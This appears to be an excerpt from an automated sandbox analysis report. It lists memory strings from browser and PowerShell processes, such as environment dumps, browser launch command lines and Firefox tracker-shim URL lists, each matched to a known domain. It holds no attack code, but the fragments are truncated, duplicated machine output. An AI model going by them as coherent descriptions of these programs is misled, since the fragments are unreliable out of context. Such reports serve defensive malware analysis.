Source: firefox.exe, 00000010.00000002.3345132926.000001A8B7EE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B868C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B868C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3029532362.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3122177082.000001A8B89B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: >e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3284374660.0000029D56104000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationj% equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account_S equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Temp\1008615041\C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Microsoft\Edge\Application;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSExecutionPolicyPreference=RemoteSignedPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Temp\1008615041\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account C:\Program Files\Mozilla Firefox\firefox.exewinsta0\default]S equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Defaultl% equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: FileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/play.svg*://imasdk.googleapis.com/js/sdkloader/ima3.js*://ssl.google-analytics.com/ga.js*://www.googletagservices.com/tag/js/gpt.js*pictureinpicture%40mozilla.org:1.0.0*://static.chartbeat.com/js/chartbeat_video.js*://track.adform.net/serving/scripts/trackpoint/*://www.google-analytics.com/analytics.js*webcompat-reporter%40mozilla.org:1.5.1*://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js**://static.chartbeat.com/js/chartbeat.js*://www.google-analytics.com/plugins/ua/ec.js@mozilla.org/addons/addon-manager-startup;1https://smartblock.firefox.etp/facebook.svg*://c.amazon-adsystem.com/aax2/apstag.js*://s0.2mdn.net/instream/html5/ima3.js*://*.imgur.com/js/vendor.*.bundle.js*://pub.doubleverify.com/signals/pub.js*FileUtils_closeAtomicFileOutputStreamwebcompat-reporter@mozilla.org.xpi*://cdn.branch.io/branch-latest.min.js**://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js*resource://services-settings/Database.sys.mjs equals www.facebook.com (Facebook)
Source: History.17.dr String found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A8380000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account5M equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account8WE equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3283028567.0000029D55F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountCSu equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountIM equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3282652339.000002B9C28B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3029532362.000001A8A8425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountl equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: chromecache_275.13.dr String found in binary or memory: _.Dq(p)+"/familylink/privacy/notice/embedded?langCountry="+_.Dq(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.Dq(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.Dq(_.Mq(c))+"&hl="+_.Dq(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.Dq(m)+"/chromebook/termsofservice.html?languageCode="+_.Dq(d)+"&regionCode="+_.Dq(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded": equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B497E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B497E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
